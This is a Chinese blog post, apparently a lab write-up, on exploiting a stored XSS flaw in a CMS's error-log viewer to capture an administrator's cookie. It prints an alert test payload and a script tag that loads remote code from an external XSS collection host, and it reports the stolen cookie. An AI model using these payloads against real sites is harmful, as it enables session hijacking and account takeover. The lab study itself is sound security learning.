存储型XSS靶场

最新推荐文章于 2023-07-31 17:15:11 发布
最新推荐文章于 2023-07-31 17:15:11 发布
阅读量349 收藏
点赞数
分类专栏: 前端渗透测试 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45540609/article/details/116107105
版权

我们看到靶场使用的是CMSv5.3.0,于是上网搜索它存在的漏洞

具体漏洞解析如这篇文章所示https://www.freebuf.com/column/165269.html

我们这里利用错误日记插入存储型xss。当我们访问不存在的文件,页面时会产生错误。产生的错误会记录到错误日志里面,源码错误日记把记录的恶意语句没有过滤,当管理员在后台点击查看错误的日志时,存储型XSS就会触发。

我们这里先用自建环境运行试验一下

在url里输入如下命令,显示了弹窗,说明存在xss漏洞

http://127.0.0.1/index.php?c=mail&m=test<script>alert(/XSS/)</script>

并且页面跳转404,说明不存在文件

登录管理页面,管理员查看错误日志时会发现弹窗,这时存储型XSS已被触发

我们在XSSPT上使用一个极限代码如下,插入url中

<sCRiPt/SrC=//xsshs.cn/bXEW>

开发者工具中显示了一个存储型XSS的文件

登录管理员界面访问错误日志

再登录xsspt我们可以看到被打的cookie和网页其他相关信息

 

 

靶场

在这里操作步骤和搭建环境中实验情况类似,步骤不再赘述,不过我一直在xsspt打不到cookie,可能是boot的原因吧

 

 

最后用xsssh站点,选择老默认模块,按照原来步骤,最后打到cookie

 

 

 

 

 

玛卡巴卡巴巴亚卡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
dvwa靶场,里面也有xss靶场
09-24
DVWA中的XSS靶场通常包含反射XSS存储XSS和DOMXSS三个部分,每个部分都有不同级别的难度,让用户逐步理解XSS的原理和防御方法。 2. **数据库连接配置** 在DVWA中,数据库连接信息位于`DVWA-master\config`...
XSS存储xss
wwwwyyyrre的博客
06-17 3092
每当有用户访问包含恶意代码的页面时,就会触发代码的执行,从而达到攻击目的。有别于反射XSS编写一次代码只能进行一次攻击的特点,存储XSS的恶意脚本一旦存储到服务器端,就能多次被使用,称之为“持久XSS”。存储XSS比反射XSS的危害更大,在于它不需要构造特殊的URL,用户访问的是一个正常的URL也可以被攻击;另一方面,它持久化在服务端,影响的范围可以比反射XSS更广。一个重要条件是,web应用中的用户之间有一定的交互,而非各玩各的。比方说,博客、论坛等,。
[ pikachu ] 靶场通关之 XSS (三) --- 存储 XSS
qq_51577576的博客
01-14 2635
???? 博主介绍 ????‍???? 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 ????点赞➕评论➕收藏 == 养成习惯(一键三连)???? ????欢迎关注????一起学习????一起讨论⭐️一起进步????文末有彩蛋 ????作者水平有限,欢迎各位大佬指点,相互学习进步! 目录 ???? 博主介绍 一、存储 XSS 二、过关: 1. 页面展示 2. 判断是否存在 XSS
DVWA靶场-中级难度
最新发布
ljlrookiebird的博客
07-31 1010
网络安全 - DVWA靶场
【安全】P 4-1 XSS跨站脚本分类
Z_David_Z的博客
02-17 277
目录0X01 XSS漏洞介绍0X02 反射XSS0X03 存储XSS0X04 DOMXSS 0X01 XSS漏洞介绍 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 0X02 反射XSS 反射XSS又称非持久性XSS,这种攻击
DVWA靶场存储XSS漏洞实验
weixin_44851588的博客
05-26 4610
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 来自菜鸟的一次简单分享,本次实验主要结合后台源代码讲解,梳理存储XSS实验的思路,如果存在问题,请各位大佬多多指导。 一、XSS基础 1.什么是XSSXSS(Cross-site scripting)被称为跨站脚本攻击,由于与层叠样式表的缩写一样,因此被缩写为XSS。 2.XSS漏洞...
xss-lab靶场资源包
07-27
2. 存储XSS:又称持久性XSS,恶意脚本被存储在服务器端,如用户评论、论坛帖子等,当其他用户访问这些内容时,浏览器会自动执行嵌入的脚本。这种类XSS更危险,因为它可以影响大量用户。 3. DOMXSS:与前...
efucms-含有存储XSS漏洞的源码包.zip
12-31
标题"efucms-含有存储XSS漏洞的源码包.zip"指出这是一个关于efucms内容管理系统(CMS)的源代码包,特别提到了存在存储跨站脚本(Stored XSS)的安全漏洞。存储XSS是一种常见的Web应用安全问题,攻击者可以...
WEB渗透学习-XSS-labs靶场
04-20
2. **存储XSS(Persistent XSS)**:这种类XSS更为危险,因为恶意脚本会被永久存储在服务器上,然后在其他用户访问相关页面时执行。在靶场中,你需要找到可以输入数据的地方,尝试插入恶意脚本,并查看是否能...
xss-labs靶场,直接放到www目录下直接用,超方便
09-24
2. **存储XSS**:恶意脚本被存储在服务器端,当其他用户查看含有该脚本的页面时,脚本被执行。 3. **DOMXSS**:不涉及服务器,而是利用浏览器的DOM(Document Object Model)特性,通过修改页面的DOM结构来注入...
XSS靶场的四种类
qq_52973916的博客
10-11 486
xss初级学习
xss存储漏洞靶场实现
rang的博客
10-23 769
什么是存储XSS: 攻击者事先将恶意代码上传或储存到漏洞服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。这就意味着只要访问了这个页面的访客,都有可能会执行这段恶意脚本,因此储存XSS的危害会更大。因为存储XSS的代码存在于网页的代码中,可以说是永久的。 存储 XSS 一般出现在网站留言、评论、博客日志等交互处,恶意脚本存储到客户端或者服务端的数据库中。 在这里我还想说明的是,要真正了解xss漏洞的原理,已及相应的payload的构造,还要求具备相应的网站编辑语言的基础。否则就是一个只
pikachu靶场练习——XSS详解
qq_42176496的博客
09-04 2678
pikachu靶场 XSS详解
手把手教你搭建XSS平台
seek_2022的博客
05-05 1万+
出于学习和技术分享的目的研究了一下XSS平台搭建的方法,由于网络上的教程虽然很多,但是对于很多细节的讲解不够深入,现将XSS平台搭建方法分享给大家。
掌控安全的靶场第三章
小白渣的博客
12-09 1371
cookie 伪造目标权限 打开传送门,可以看到这样的页面 按照题目提示是一个存储xss,于是我们在能留言的地方都输入看看有没有弹窗, 成功弹窗了 因为XSS Payload的强大,也是为了使用的方便,有安全研究者将许多功能封装了起来做成了XSS平台。也是因为插入点一般都有长度限制,所以说xss一般攻击都需要外链。我在这里演示用的是网上的xss平台:http://xsspt.com,随便...
DC-6靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-02 1464
dc-6靶场详细渗透过程
存储XSS简介
热门推荐
seek_2022的博客
05-05 1万+
文章目录一、存储XSS简介(一)存储XSS的概念(二)存储XSS攻击过程(三)打XSS的潜在风险二、XSS平台使用方法三、靶场实战 一、存储XSS简介 (一)存储XSS的概念 存储XSS又称持久XSS,攻击脚本将被永久地存放在目标服务器的数据库或文件中,具有很高的隐蔽性。反射XSS的被攻击对象一般是攻击者去寻找的,就比如说:一个攻击者想盗取A的账号,那么攻击者就可以将一个含有反射XSS的特制URL链接发送给A,然后用花言巧语诱骗A点击链接。当A不小心点进去时,就会立即受到XSS攻击。这种
封神台存储Xss靶场
qq_40941912的博客
10-05 605
作业 存储Xss靶场 (Rank: 10) 靶场上面是个finecms,然后在网上搜索了一下它所存在的漏洞,发现在404界面会将地址栏的get传参输入到日志里面,存储到数据库,将参数值替换成我们构造好的payload,当管理员产看日志的时候会触发payload,存在一个存储xss 于是找到传参点: 在xss平台建立一个项目,得到构造好的payload: 当作m的参数传进去: 拿到cookie: 成功拿到flag{zKaQ-01sdfDCo0} 提交flag,成功
Pikachu靶场存储XSS
witwitwiter的博客
04-16 2438
Pikachu靶场存储XSS 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 ●存储 交互的数据会被存在在数据库里面,永久性存储,一般出现在留言板,注册等页面。 形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。存储XSS漏洞跟反射形成的原因一样,不同的是存储XSS下攻击者可以将脚本注入到后台存储起来,构成更加持久的危害,因此存储XSS也称“永久XSS
博世CMS40_CHI简易编程操作手册范本.pdf
05-17
博世CMS40_CHI简易编程操作手册范本.pdf

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值